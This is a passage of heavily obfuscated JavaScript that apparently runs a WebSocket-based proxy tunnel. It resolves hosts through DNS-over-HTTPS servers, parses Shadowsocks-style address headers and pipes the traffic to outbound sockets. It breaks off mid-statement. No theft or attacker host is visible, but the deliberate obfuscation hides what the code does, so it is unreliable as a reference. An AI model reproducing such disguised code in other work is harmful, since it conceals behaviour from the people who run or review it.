_0x5b6322={};_0x5b6322[_0x42f5d3(_0x2a59e9._0x2cfd83,0x2c,0x8f,_0x2a59e9._0x4095fd)]=_0x42f5d3(_0x2a59e9._0x571516,-0x5e,_0x2a59e9._0x45d533,_0x2a59e9._0x4095fd),_0x2a3060[_0xaaf8c6(-_0x2a59e9._0x41ad0d,-_0x2a59e9._0x4415b5,0x93,_0x2a59e9._0x21d203)](0xc05+0x1*-0x18af+0xd72,_0x5b6322),_0x3fa57b['end'](_0x1be0fa);}else{_0x20a948[_0x42f5d3(_0x2a59e9._0x7ad62e,_0x2a59e9._0x105516,_0x2a59e9._0x3f1e39,0xb6)](_0x544485,new Error('Failed\x20to\x20resolve\x20'+_0x2c1bc7+_0xaaf8c6(-0x8,-0x15,-_0x2a59e9._0x18e267,-_0x2a59e9._0x21c769)));return;}}const _0x191611=DNS_SERVERS[_0x2364e8];_0x2364e8++;const _0x3262e0=_0xaaf8c6(_0x2a59e9._0x113710,-0x2b,_0x2a59e9._0x46eefa,_0x2a59e9._0x2637b2)+_0x20a948[_0xaaf8c6(0xa6,_0x2a59e9._0x4c4765,-0x25,0x4e)](encodeURIComponent,_0x2c1bc7)+_0x42f5d3(_0x2a59e9._0x432237,_0x2a59e9._0x11fd5d,_0x2a59e9._0x305865,_0x2a59e9._0x1dfa59);function _0x42f5d3(_0x30b03d,_0x414fc0,_0xdf3f50,_0x5ed927){return _0x24390e(_0x30b03d-_0x275609._0x433440,_0x414fc0-_0x275609._0x35abe5,_0xdf3f50,_0x30b03d- -_0x275609._0x336b46);}const _0x374aaa={};_0x374aaa[_0xaaf8c6(_0x2a59e9._0x28f855,_0x2a59e9._0x330cd6,_0x2a59e9._0x4095fd,_0x2a59e9._0x4f9585)]=_0x20a948[_0xaaf8c6(-0x2c,_0x2a59e9._0x1c8348,_0x2a59e9._0x2f2388,_0x2a59e9._0x3dfcab)];const _0x47c1c5={};_0x47c1c5[_0xaaf8c6(-0x83,-_0x2a59e9._0x5b1a0a,-0x8c,-_0x2a59e9._0x1d8f97)]=0x1388,_0x47c1c5[_0xaaf8c6(-_0x2a59e9._0x4a8af6,-_0x2a59e9._0x562f23,-_0x2a59e9._0x42e9b3,-0x6b)]=_0x374aaa,axios[_0xaaf8c6(-_0x2a59e9._0x3e2c5e,-_0x2a59e9._0x2b6583,-_0x2a59e9._0x54d9da,-_0x2a59e9._0x571516)](_0x3262e0,_0x47c1c5)[_0x42f5d3(0x71,_0x2a59e9._0x5627f8,_0x2a59e9._0x558f63,_0x2a59e9._0x245bfa)](_0x3e636a=>{const _0x41a603=_0x3e636a[_0x4ec326(_0x6f12c3._0x40b0ca,_0x6f12c3._0x27d568,_0x6f12c3._0x1891f1,_0x6f12c3._0x976d24)];function _0x4ec326(_0xa67fd6,_0x3751a0,_0x41e05f,_0xa00679){return _0x42f5d3(_0xa00679-0x7f,_0x3751a0-_0x620ed8._0x2e9791,_0x41e05f,_0xa00679-0x70);}if(_0x51bf19[_0x1694ba(0x235,0x28c,_0x6f12c3._0xfd7687,_0x6f12c3._0x5e149d)](_0x41a603['Status'],0x21bb+0x14be+-0x1*0x3679)&&_0x41a603[_0x1694ba(_0x6f12c3._0x123200,_0x6f12c3._0x23f5a0,0x225,_0x6f12c3._0x565a5c)]&&_0x51bf19[_0x1694ba(_0x6f12c3._0x1ca234,_0x6f12c3._0x2ef89f,_0x6f12c3._0x4c3a22,_0x6f12c3._0x3a6b2f)](_0x41a603[_0x1694ba(_0x6f12c3._0x5c93d3,_0x6f12c3._0x5446ef,_0x6f12c3._0x5484f2,0x1f9)]['length'],0x9cf+0x1*-0x20e7+0x1718)){if(_0x51bf19[_0x4ec326(_0x6f12c3._0x34fe9b,_0x6f12c3._0x285054,_0x6f12c3._0x14669e,0x18d)]===_0x51bf19['GtBAF']){const _0x157d14=_0x41a603[_0x1694ba(_0x6f12c3._0x29090d,_0x6f12c3._0xe8fc,_0x6f12c3._0x3200cd,0x1f9)]['find'](_0x4f4cb8=>_0x4f4cb8['type']===-0xa21+-0xf32+-0x1954*-0x1);if(_0x157d14){if(_0x51bf19[_0x1694ba(0x2d3,_0x6f12c3._0x530c21,0x23e,_0x6f12c3._0x4f0cf1)](_0x51bf19[_0x1694ba(0x1e2,_0x6f12c3._0x450e35,_0x6f12c3._0x485178,0x249)],_0x51bf19[_0x4ec326(_0x6f12c3._0x1645ef,0x137,_0x6f12c3._0x4abd81,0x149)])){const _0x3686c9={};_0x3686c9[_0x1694ba(_0x6f12c3._0x44e164,_0x6f12c3._0x173239,_0x6f12c3._0x5d0662,_0x6f12c3._0x40e4b6)]='text/plain',_0x29eebf[_0x1694ba(0x2ac,_0x6f12c3._0x5089cc,_0x6f12c3._0x38961b,_0x6f12c3._0x22c6bd)](-0x2418+0x29*0xc5+0x61f,_0x3686c9),_0x13c5da['end'](_0x51bf19['teqTx']);}else{_0x51bf19['XozUl'](_0x19a4f1,_0x157d14['data']);return;}}}else _0x1e0443=_0x51bf19[_0x4ec326(_0x6f12c3._0x250322,0x5c,_0x6f12c3._0x4fecb3,0x90)];}function _0x1694ba(_0x4350c7,_0x4083e9,_0x4b9638,_0x3cf80b){return _0x42f5d3(_0x3cf80b-0x17f,_0x4083e9-_0x1e397e._0x1d37b8,_0x4083e9,_0x3cf80b-_0x1e397e._0x855581);}_0x51bf19[_0x4ec326(_0x6f12c3._0x29a78f,_0x6f12c3._0x4ee324,_0x6f12c3._0x3bb489,0xb7)](_0x13b903);})[_0xaaf8c6(-0x44,-_0x2a59e9._0x17c457,-_0x2a59e9._0x4c4765,-0x43)](_0x71d5a2=>{const _0x44150d={_0x12be18:0xa4,_0x4d00a9:0x1f3},_0x4bed12={_0x15e249:0x1ae,_0x474a7a:0x1c6,_0x3dc8cf:0x82};function _0x3386a5(_0x197acb,_0x3c8781,_0x39d6cd,_0x5261ca){return _0x42f5d3(_0x39d6cd-_0x4bed12._0x15e249,_0x3c8781-_0x4bed12._0x474a7a,_0x5261ca,_0x5261ca-_0x4bed12._0x3dc8cf);}function _0x28d772(_0x44bf78,_0x436a49,_0x7758f1,_0xd027f8){return _0xaaf8c6(_0x44bf78,_0x436a49-_0x44150d._0x12be18,_0x7758f1-_0x44150d._0x4d00a9,_0x436a49- -0x1e3);}if(_0x3386a5(_0xd82be._0x118507,_0xd82be._0x281b76,_0xd82be._0x4266b5,_0xd82be._0x10c238)!=='OeyIP')_0x51bf19[_0x3386a5(0x21f,0x253,_0xd82be._0x7820c8,0x249)](_0x13b903);else{if(_0x51bf19[_0x28d772(-0x256,-0x225,-_0xd82be._0x2cdab5,-0x25d)](_0x4ba88e,_0x2d8a4c,_0x4d277c))return;}});}function _0x307824(_0x2e4fa5,_0x2836b2,_0x36ed47,_0x20a2c6){return _0x40d694(_0x2e4fa5,_0x2836b2-_0x38088f._0x12edf6,_0x36ed47-_0x38088f._0x565b05,_0x2836b2-_0x38088f._0x321dc2);}function _0x24390e(_0x3bdfab,_0x3b7ac4,_0x486c2b,_0x79376b){return _0x40d694(_0x486c2b,_0x3b7ac4-_0x746c1c._0x271fd2,_0x486c2b-_0x746c1c._0x40f5a2,_0x79376b- -0x16d);}_0x20a948[_0x307824(0x460,_0x6fee44._0x5ebcd8,_0x6fee44._0x22dbaa,0x451)](_0x13b903);});}function handleSsConnection(_0x42372e,_0x428b21){const _0x1b5af5={_0x475ca2:0x125,_0x139b4f:0x151,_0x32ff98:0x179,_0x59e53b:0x13c,_0x33549a:0x22f,_0x61e291:0x213,_0x30d7cb:0x233,_0x5babad:0x23c,_0x4caf03:0x2a7,_0x5c0da4:0x144,_0x59ab5d:0x8e,_0x54f790:0xe1,_0x48abab:0x150,_0x421f11:0xfd,_0x256d83:0x74,_0x541264:0xc6,_0x350ad6:0x16e,_0x58c4bb:0x11b,_0x2030c5:0x152,_0x13209b:0xb8,_0x4419d9:0x82,_0x58472a:0x1ae,_0x49841d:0x24b,_0x766e8:0x21e,_0x362bec:0x239,_0x50702a:0x27e,_0x5ee407:0x28e,_0x216244:0x6a,_0x5cbdd5:0xa6,_0x49a0f2:0x7d,_0x4c7e78:0x171,_0x5677ad:0x187,_0x66b0ca:0x12a,_0x45b220:0x13b,_0x537dd9:0x10e,_0x238ca2:0x24a,_0x16767a:0x289,_0x1fa1c2:0x271,_0x5b68ea:0x270,_0x114e99:0x220,_0x438c9f:0x2b7,_0x20732f:0x241,_0x475ca5:0x261,_0x4bf8ce:0x153,_0x56e48b:0x11c,_0xea1f2a:0xdb,_0x543348:0x5f,_0x3e71d2:0xf9,_0x1023c8:0x99,_0x313d41:0x255,_0x5404af:0x291,_0x4137ff:0x339,_0x674c29:0x29e,_0x269203:0x235,_0x55baa7:0x2b6,_0x2921ff:0x196,_0x6a36b7:0x202,_0x3ad9cf:0x1e9,_0x4d2605:0x2d9,_0x563506:0x28a,_0x5cc438:0x2bd,_0x1af7d9:0x124,_0x117087:0x135,_0x35aa3a:0x173,_0x1f1da5:0xda,_0x46c8e5:0xbc,_0x2cd17a:0x9f,_0x31e08e:0x15b,_0x2d99e1:0x16f,_0xad1825:0xf6,_0x55458b:0xdc,_0x586123:0x69,_0x248971:0x92,_0x5a2262:0x111,_0x33c737:0xf1,_0x275ca8:0x10c},_0x18a70d={_0x483a7b:0x2b3,_0x2a32fc:0x2fa,_0x5cf4da:0x240,_0x4a4b88:0x1c8,_0x28c4d7:0x176,_0x2e2477:0x24c,_0x578b6c:0x1a6,_0x117f9a:0x154,_0x551187:0xf5,_0x1f16e2:0x17c,_0x3e5de8:0x138,_0x1e9400:0x320,_0x56d181:0x2ff,_0x5383fa:0x201,_0x5127e7:0x1e1,_0x3e6554:0x1b3},_0x3507a4={_0x354e66:0x3ea,_0x2860d1:0x3e5,_0x1b247f:0x372,_0x385e4d:0x34c,_0x1bce4c:0x3ac,_0x12269f:0x39f,_0x59ba1f:0x1e1,_0x5aecbc:0x3aa,_0x355774:0x49a,_0x32246a:0x416,_0x122a9e:0x212,_0x34b343:0x248,_0x57f08a:0x258,_0x9e25ef:0x22f,_0x224fa6:0x275,_0x405d3e:0x202,_0x45b901:0x3c8,_0x5ae478:0x427,_0x237539:0x343,_0x4c5e53:0x1f2,_0xf9feaf:0x120,_0x2c4e53:0x190,_0x2a4e81:0x13e,_0x5619a7:0xfa,_0x63fc7a:0x18a,_0x13f10b:0x15c,_0x2cf9d8:0x38d,_0x2766a1:0x45b,_0x2e9ed1:0x447,_0xa9d939:0x3e0},_0x2adbb2={_0xc84213:0xb6,_0x51b6f5:0xad},_0x5bbd04={_0x5a7ab4:0x160,_0x4bb9ee:0x180,_0xadc24a:0x197,_0x108d83:0xff},_0x146711={_0x3260ad:0x7b,_0x8d306e:0x72,_0xef4854:0x59,_0x47fa68:0x22,_0x5a8089:0x44,_0x31762d:0x41,_0x1ea9af:0x10f,_0x49483d:0x1b9,_0x2524fd:0x141,_0x4ca8c7:0xc5,_0x376de7:0x51,_0x77bfe:0x83,_0x4121ee:0x3a,_0x39b2e8:0x20,_0x3e6e3a:0x5f,_0x3f652e:0x37,_0x43a3c4:0x10,_0xbbca2b:0x7b,_0x58358a:0xf,_0x43ed6a:0x4d,_0x522586:0x17,_0x4dc79b:0x22d,_0x4da0d8:0x245,_0x297fbb:0x1d2,_0x158325:0x3e,_0x520fe6:0x1f,_0x516105:0x57,_0x1c2f10:0x58,_0x4143be:0x97,_0x260a25:0x7e,_0x1f75cc:0x91,_0x26b1b4:0x73,_0x3463ad:0x1d,_0xbc6bde:0x64,_0x2fac41:0x1d,_0x4005a2:0x6b,_0xe288a2:0xbd,_0x47b5fd:0xfd,_0x4ebb0f:0xec,_0x4a6b71:0x78},_0x46f5fe={_0x15b1ba:0x16a,_0x3569bd:0x17d,_0x5b6e35:0xe1},_0x4065dd={_0xffcc61:0x2fb},_0x2f8eb3={_0x53fb0e:0x11c,_0x48857b:0xe2};function _0x493ab2(_0x565994,_0x1b44da,_0x283295,_0x50e47a){return _0x20ed0c(_0x283295-_0x2f8eb3._0x53fb0e,_0x1b44da-_0x2f8eb3._0x48857b,_0x283295-0x15c,_0x565994);}const _0x2b64a6={'KOXaW':function(_0x1c8a9f,_0x5db23b){return _0x1c8a9f<_0x5db23b;},'BJDIb':'error','RkKQO':function(_0x20d185,_0x1d690c){return _0x20d185!==_0x1d690c;},'TCrEE':_0x493ab2(_0x1b5af5._0x475ca2,_0x1b5af5._0x139b4f,_0x1b5af5._0x32ff98,_0x1b5af5._0x59e53b),'uOAPy':_0x73687c(-_0x1b5af5._0x33549a,-_0x1b5af5._0x61e291,-_0x1b5af5._0x30d7cb,-0x263),'LnLsA':function(_0x2b2496,_0x3da809){return _0x2b2496(_0x3da809);},'BeCNQ':'mnygb','DgpOJ':_0x73687c(-_0x1b5af5._0x5babad,-0x23f,-_0x1b5af5._0x4caf03,-0x231),'IvJMT':function(_0x282d79,_0x2542df){return _0x282d79===_0x2542df;},'NdMpz':function(_0x1103f3,_0x24bb35){return _0x1103f3===_0x24bb35;},'XLGVD':function(_0x2764de,_0x13f98c){return _0x2764de===_0x13f98c;},'WIyeI':function(_0x2e6dc7,_0x4626bf){return _0x2e6dc7+_0x4626bf;},'PMASO':_0x493ab2(_0x1b5af5._0x5c0da4,_0x1b5af5._0x59ab5d,_0x1b5af5._0x54f790,0x73),'jTZVM':function(_0x3d4653,_0x473f4d){return _0x3d4653(_0x473f4d);}};function _0x73687c(_0x4e908b,_0x477eba,_0x2aae48,_0x573403){return _0x18aada(_0x4e908b,_0x573403- -_0x4065dd._0xffcc61,_0x2aae48-0xa5,_0x573403-0x160);}try{let _0x209fe9=-0x1aa5*-0x1+0x21b*0xe+-0x381f;const _0x3c6388=_0x428b21[_0x209fe9];_0x209fe9+=0x37*0x4d+-0x1*-0x3+-0x108d;let _0x1881f4,_0x5ebc8c;if(_0x2b64a6['IvJMT'](_0x3c6388,0x1749+0x188b+-0x2fd3))_0x1881f4=_0x428b21['slice'](_0x209fe9,_0x209fe9+(-0x267+0x67*0x2b+0x1*-0xee2))[_0x493ab2(_0x1b5af5._0x48abab,_0x1b5af5._0x421f11,0xec,_0x1b5af5._0x256d83)]('.'),_0x209fe9+=0x1463+-0x470+-0x1*0xfef;else{if(_0x2b64a6[_0x493ab2(_0x1b5af5._0x541264,_0x1b5af5._0x350ad6,_0x1b5af5._0x58c4bb,_0x1b5af5._0x2030c5)](_0x3c6388,-0x76e*-0x1+0x1a3+-0x90e)){const _0x3e6f8b=_0x428b21[_0x209fe9];_0x209fe9+=0x4c3*-0x1+-0x1*0x92f+0xdf3,_0x1881f4=_0x428b21[_0x493ab2(_0x1b5af5._0x13209b,0x88,0xa6,_0x1b5af5._0x4419d9)](_0x209fe9,_0x209fe9+_0x3e6f8b)[_0x73687c(-_0x1b5af5._0x58472a,-_0x1b5af5._0x49841d,-0x1a3,-_0x1b5af5._0x766e8)](),_0x209fe9+=_0x3e6f8b;}else{if(_0x2b64a6[_0x73687c(-_0x1b5af5._0x362bec,-_0x1b5af5._0x50702a,-0x265,-_0x1b5af5._0x5ee407)](_0x3c6388,0x19b*-0x10+-0x3*-0xf1+0x16e1))_0x1881f4=_0x428b21[_0x493ab2(_0x1b5af5._0x216244,0xba,_0x1b5af5._0x5cbdd5,_0x1b5af5._0x49a0f2)](_0x209fe9,_0x2b64a6[_0x493ab2(0x1d7,_0x1b5af5._0x4c7e78,_0x1b5af5._0x5677ad,_0x1b5af5._0x66b0ca)](_0x209fe9,-0x299*0x6+0x5e5*-0x2+-0x10*-0x1b7))[_0x493ab2(_0x1b5af5._0x45b220,0x169,_0x1b5af5._0x537dd9,0x10a)]((_0x4fa81b,_0x8138e4,_0x30a51f,_0x3626fb)=>_0x30a51f%(0xd*-0x17f+-0x19fa+0x2d6f)?_0x4fa81b[_0x73687c(-0x26a,-0x2b2,-0x338,-0x2cc)](_0x3626fb[_0x493ab2(0x11b,0x84,0xa6,0x9f)](_0x30a51f-(0x1060+0x3d*-0x17+-0x29*0x44),_0x30a51f+(-0xf79+0xb2*-0x5+0x12f4))):_0x4fa81b,[])['map'](_0x1a87b3=>_0x1a87b3[_0x493ab2(0x18b,0x181,0x16f,0x1e5)](0xbc8*0x1+-0x7c7*0x1+-0x401)['toString'](0x542+0x679*0x1+-0x67*0x1d))[_0x73687c(-_0x1b5af5._0x238ca2,-_0x1b5af5._0x16767a,-_0x1b5af5._0x1fa1c2,-_0x1b5af5._0x5b68ea)](':'),_0x209fe9+=0x2b*0xd6+0x1d8f+0x4171*-0x1;else{if(_0x2b64a6[_0x73687c(-_0x1b5af5._0x114e99,-_0x1b5af5._0x438c9f,-_0x1b5af5._0x20732f,-_0x1b5af5._0x475ca5)]!=='XFVlK')_0x2b64a6[_0x493ab2(_0x1b5af5._0x4bf8ce,_0x1b5af5._0x56e48b,0x124,_0x1b5af5._0xea1f2a)](_0x9c51b6,_0x5374bb[_0x493ab2(_0x1b5af5._0x543348,_0x1b5af5._0x3e71d2,_0x1b5af5._0x1023c8,0x105)])&&this[_0x73687c(-0x278,-_0x1b5af5._0x313d41,-_0x1b5af5._0x5404af,-0x210)](_0x1c0823[_0x73687c(-_0x1b5af5._0x4137ff,-_0x1b5af5._0x674c29,-_0x1b5af5._0x269203,-_0x1b5af5._0x55baa7)](_0x419e30)),_0x47d3e3['on'](_0x2b64a6[_0x73687c(-0x226,-_0x1b5af5._0x2921ff,-_0x1b5af5._0x6a36b7,-_0x1b5af5._0x3ad9cf)],()=>{})[_0x73687c(-_0x1b5af5._0x4d2605,-0x2e0,-_0x1b5af5._0x563506,-_0x1b5af5._0x5cc438)](this)['on'](_0x2b64a6[_0x493ab2(_0x1b5af5._0x1af7d9,_0x1b5af5._0x117087,_0x1b5af5._0x35aa3a,0x1bc)],()=>{})[_0x493ab2(_0x1b5af5._0x1f1da5,_0x1b5af5._0x46c8e5,_0x1b5af5._0x2cd17a,0x4f)](_0x132a1c);else return![];}}}_0x5ebc8c=_0x428b21[_0x493ab2(0x12b,_0x1b5af5._0x31e08e,_0x1b5af5._0x2d99e1,_0x1b5af5._0xad1825)](_0x209fe9),_0x209fe9+=0x14ff+0x1053+-0x2550;if(isBlockedDomain(_0x1881f4))return _0x42372e[_0x493ab2(_0x1b5af5._0x55458b,_0x1b5af5._0x586123,_0x1b5af5._0x248971,0x10d)](),![];const _0x28ac76=_0x2b64a6['jTZVM'](createWebSocketStream,_0x42372e);return resolveHost(_0x1881f4)[_0x493ab2(0xae,_0x1b5af5._0x5a2262,_0x1b5af5._0x33c737,_0x1b5af5._0x275ca8)](_0x55a902=>{const _0x4f4e99={_0x42518f:0x8e,_0x97648f:0x89,_0x1064f7:0x116,_0x355ffe:0xfb,_0x1fd70b:0xc3,_0x198fc6:0x70,_0x3df219:0x10,_0x1aec32:0x26b,_0x55e33d:0x27a,_0x44fd83:0x24d,_0x3a3cc3:0x24f,_0x12e7f2:0x237,_0x3c9c32:0x26e,_0x5c22ff:0x263,_0x4c5400:0x28e,_0x542b3f:0x2ec,_0x486519:0x28f},_0x389f63={_0x499227:0x80,_0x291a0d:0x1bd,_0x42bbc9:0x211},_0x4a12c7={_0x1374e5:0xa0,_0x3ba9ab:0xc9,_0x4ecbeb:0x46},_0x4a3a84={_0x194518:0x108,_0x5153cb:0x100,_0x56290d:0x1b6};function _0x3cdd3f(_0x16f927,_0x3dbb8e,_0x29c4e1,_0x275b56){return _0x493ab2(_0x3dbb8e,_0x3dbb8e-_0x4a3a84._0x194518,_0x275b56- -_0x4a3a84._0x5153cb,_0x275b56-_0x4a3a84._0x56290d);}function _0x6b20ce(_0x1c3ed3,_0x1eb6c6,_0x550dec,_0x1f606d){return _0x73687c(_0x1f606d,_0x1eb6c6-_0x46f5fe._0x15b1ba,_0x550dec-_0x46f5fe._0x3569bd,_0x550dec-_0x46f5fe._0x5b6e35);}const _0x4b6c63={'hGrEw':function(_0x2bc0e4,_0x1253ba){const _0x307d78={_0x462f8a:0x1ba};function _0x43ee34(_0x54b175,_0xe127eb,_0x4b546e,_0x28fe99){return _0x1711(_0x54b175- -_0x307d78._0x462f8a,_0x28fe99);}return _0x2b64a6[_0x43ee34(-_0x4a12c7._0x1374e5,-_0x4a12c7._0x3ba9ab,-0xdf,-_0x4a12c7._0x4ecbeb)](_0x2bc0e4,_0x1253ba);},'VslUF':'Unknown'};if(_0x2b64a6[_0x3cdd3f(-0x3c,-_0x146711._0x3260ad,-_0x146711._0x8d306e,-_0x146711._0xef4854)](_0x2b64a6['TCrEE'],_0x2b64a6[_0x3cdd3f(_0x146711._0x47fa68,_0x146711._0x5a8089,-0x37,_0x146711._0x31762d)])){const _0x9eed40={};_0x9eed40[_0x6b20ce(-_0x146711._0x1ea9af,-_0x146711._0x49483d,-_0x146711._0x2524fd,-_0x146711._0x4ca8c7)]=_0x55a902,_0x9eed40[_0x3cdd3f(0x6,-_0x146711._0x376de7,-_0x146711._0x77bfe,-_0x146711._0x4121ee)]=_0x5ebc8c,net[_0x3cdd3f(-_0x146711._0x39b2e8,_0x146711._0x3e6e3a,_0x146711._0x3f652e,-0x16)](_0x9eed40,function(){const _0x2617d5={_0x3e0246:0x12,_0x167d53:0x13c,_0x143f19:0x11f};_0x4b6c63[_0x1b7e8(_0x4f4e99._0x42518f,0x96,_0x4f4e99._0x97648f,0x37)](_0x209fe9,_0x428b21[_0x1b7e8(-0x11c,-_0x4f4e99._0x1064f7,-_0x4f4e99._0x355ffe,-_0x4f4e99._0x1fd70b)])&&this[_0x1b7e8(-0x1e,-0x8,_0x4f4e99._0x198fc6,-_0x4f4e99._0x3df219)](_0x428b21[_0xfa323c(-_0x4f4e99._0x1aec32,-0x1ee,-0x287,-_0x4f4e99._0x55e33d)](_0x209fe9));function _0xfa323c(_0x34e8de,_0x4d86cd,_0x2b76c2,_0x4cb73e){return _0x3cdd3f(_0x34e8de-_0x389f63._0x499227,_0x4d86cd,_0x2b76c2-_0x389f63._0x291a0d,_0x34e8de- -_0x389f63._0x42bbc9);}function _0x1b7e8(_0x3d6305,_0x55bfdb,_0x31c2ae,_0xb6c6f1){return _0x6b20ce(_0x3d6305-_0x2617d5._0x3e0246,_0x55bfdb-_0x2617d5._0x167d53,_0xb6c6f1-_0x2617d5._0x143f19,_0x3d6305);}_0x28ac76['on'](_0xfa323c(-0x237,-_0x4f4e99._0x44fd83,-0x290,-_0x4f4e99._0x3a3cc3),()=>{})['pipe'](this)['on'](_0xfa323c(-_0x4f4e99._0x12e7f2,-0x23a,-_0x4f4e99._0x3c9c32,-_0x4f4e99._0x5c22ff),()=>{})[_0xfa323c(-0x272,-_0x4f4e99._0x4c5400,-_0x4f4e99._0x542b3f,-_0x4f4e99._0x486519)](_0x28ac76);})['on'](_0x2b64a6['BJDIb'],()=>{});}else{const _0xda6267=_0xcdd3d[_0x3cdd3f(-_0x146711._0x43a3c4,-_0x146711._0xbbca2b,_0x146711._0x58358a,-0x2d)]||'UN';let _0x16c52d=_0x4b6c63[_0x3cdd3f(-0x59,-_0x146711._0x43ed6a,0x99,_0x146711._0x522586)];_0x45074d[_0x6b20ce(-_0x146711._0x4dc79b,-_0x146711._0x4da0d8,-_0x146711._0x297fbb,-0x1ee)]?_0x16c52d=_0x1a4570[_0x3cdd3f(-_0x146711._0x158325,-_0x146711._0x520fe6,-0x24,-_0x146711._0x516105)][_0x3cdd3f(_0x146711._0x1c2f10,_0x146711._0x4143be,_0x146711._0x260a25,_0x146711._0x260a25)]||_0x5dfc9f['connection'][_0x3cdd3f(_0x146711._0x1f75cc,_0x146711._0x26b1b4,_0x146711._0x3463ad,_0x146711._0xbc6bde)]||_0x4b6c63[_0x3cdd3f(-_0x146711._0x3463ad,-_0x146711._0x2fac41,-_0x146711._0x4005a2,_0x146711._0x522586)]:_0x16c52d=_0x308f87[_0x6b20ce(-_0x146711._0x77bfe,-_0x146711._0xe288a2,-_0x146711._0x47b5fd,-_0x146711._0x4ebb0f)]||_0x4b6c63[_0x3cdd3f(_0x146711._0x4a6b71,-0x6b,-_0x146711._0x3f652e,_0x146711._0x522586)],_0x15883f=(_0xda6267+'-'+_0x16c52d)['replace'](/[\s,]+/g,'_');}})['catch'](_0x54808a=>{const _0x3dcb7c={_0x4c2925:0x16d},_0x39600c={_0x2535c4:0x115,_0x199f83:0x1d8,_0x456feb:0xf0},_0xe361db={_0x32d7d6:0x48,_0x218dcf:0xbb,_0x24dd4d:0x77},_0x150333={_0x15b453:0x18d},_0x39736c={'NcVcs':function(_0x1ac14f,_0x9017e4){function _0x2926c8(_0x1774c8,_0x11873a,_0x958a89,_0x52820d){return _0x1711(_0x11873a- -_0x150333._0x15b453,_0x958a89);}return _0x2b64a6[_0x2926c8(-_0xe361db._0x32d7d6,-0x3d,-_0xe361db._0x218dcf,-_0xe361db._0x24dd4d)](_0x1ac14f,_0x9017e4);},'GgDgO':function(_0x114c9b,_0x301a2e){const _0x2fa627={_0x5d0519:0xc3};function _0x3fc902(_0x757370,_0x44ff2a,_0x10e9ec,_0x3bb888){return _0x1711(_0x757370-_0x2fa627._0x5d0519,_0x10e9ec);}return _0x2b64a6[_0x3fc902(_0x5bbd04._0x5a7ab4,_0x5bbd04._0x4bb9ee,_0x5bbd04._0xadc24a,_0x5bbd04._0x108d83)](_0x114c9b,_0x301a2e);},'iNArI':_0x2b64a6['BeCNQ'],'aKCWp':_0x2b64a6[_0xb8f49f(_0x18a70d._0x483a7b,0x286,_0x18a70d._0x2a32fc,_0x18a70d._0x5cf4da)]},_0x13ce69={};_0x13ce69[_0x590bb8(_0x18a70d._0x4a4b88,_0x18a70d._0x28c4d7,_0x18a70d._0x2e2477,_0x18a70d._0x578b6c)]=_0x1881f4;function _0xb8f49f(_0xca7374,_0x12ac75,_0x1a04d4,_0x405860){return _0x493ab2(_0x12ac75,_0x12ac75-_0x39600c._0x2535c4,_0xca7374-_0x39600c._0x199f83,_0x405860-_0x39600c._0x456feb);}function _0x590bb8(_0x2dfa13,_0x340b9d,_0xa68e25,_0x1fbf2d){return _0x493ab2(_0x1fbf2d,_0x340b9d-_0x2adbb2._0xc84213,_0x2dfa13-0x8e,_0x1fbf2d-_0x2adbb2._0x51b6f5);}_0x13ce69[_0x590bb8(_0x18a70d._0x117f9a,_0x18a70d._0x551187,_0x18a70d._0x1f16e2,_0x18a70d._0x3e5de8)]=_0x5ebc8c,net[_0xb8f49f(0x2c2,0x302,_0x18a70d._0x1e9400,_0x18a70d._0x56d181)](_0x13ce69,function(){const _0x55bd7e={_0x5d4d89:0x28,_0x3a3308:0x1ed,_0x2d0125:0xe1};function _0x330a1c(_0x12775e,_0x159df8,_0xfffee3,_0x587d66){return _0x590bb8(_0x587d66-0x278,_0x159df8-_0x3dcb7c._0x4c2925,_0xfffee3-0x4d,_0x12775e);}function _0x448f60(_0x3405bf,_0x58fa43,_0x58a554,_0x546e77){return _0x590bb8(_0x58a554-_0x55bd7e._0x5d4d89,_0x58fa43-_0x55bd7e._0x3a3308,_0x58a554-_0x55bd7e._0x2d0125,_0x546e77);}if(_0x39736c['GgDgO'](_0x39736c['iNArI'],_0x39736c[_0x330a1c(_0x3507a4._0x354e66,0x454,0x3b5,_0x3507a4._0x2860d1)]))return;else{if(_0x209fe9<_0x428b21[_0x330a1c(_0x3507a4._0x1b247f,_0x3507a4._0x385e4d,_0x3507a4._0x1bce4c,_0x3507a4._0x12269f)]){if(_0x39736c['GgDgO'](_0x448f60(0x18e,0x257,_0x3507a4._0x59ba1f,0x163),_0x39736c[_0x330a1c(_0x3507a4._0x5aecbc,_0x3507a4._0x355774,0x42e,_0x3507a4._0x32246a)])){_0x39736c[_0x448f60(_0x3507a4._0x122a9e,0x2b7,_0x3507a4._0x34b343,_0x3507a4._0x57f08a)](_0x5b50ee,_0x932b32[_0x448f60(_0x3507a4._0x9e25ef,_0x3507a4._0x224fa6,0x228,_0x3507a4._0x405d3e)]);return;}else this['write'](_0x428b21[_0x330a1c(_0x3507a4._0x45b901,_0x3507a4._0x5ae478,_0x3507a4._0x237539,_0x3507a4._0x1bce4c)](_0x209fe9));}_0x28ac76['on'](_0x448f60(_0x3507a4._0x4c5e53,_0x3507a4._0xf9feaf,_0x3507a4._0x2c4e53,_0x3507a4._0x2a4e81),()=>{})[_0x448f60(_0x3507a4._0x5619a7,_0x3507a4._0x63fc7a,0x155,_0x3507a4._0x13f10b)](this)['on'](_0x330a1c(_0x3507a4._0x2cf9d8,_0x3507a4._0x2766a1,_0x3507a4._0x2e9ed1,_0x3507a4._0xa9d939),()=>{})['pipe'](_0x28ac76);}})['on'](_0x2b64a6[_0x590bb8(_0x18a70d._0x5383fa,_0x18a70d._0x5127e7,0x222,_0x18a70d._0x3e6554)],()=>{});}),!![];}catch(_0x2c2867){return![];}}const _0x12e8f0={};_0x12e8f0[_0x18aada(0x89,0x51,-0x30,0xa)]=httpServer;const wss=new WebSocket[(_0x18aada(0x15,0x75,0x69,0xf4))](_0x12e8f0);wss['on']('connection',(_0x54a527,_0x146287)=>{const 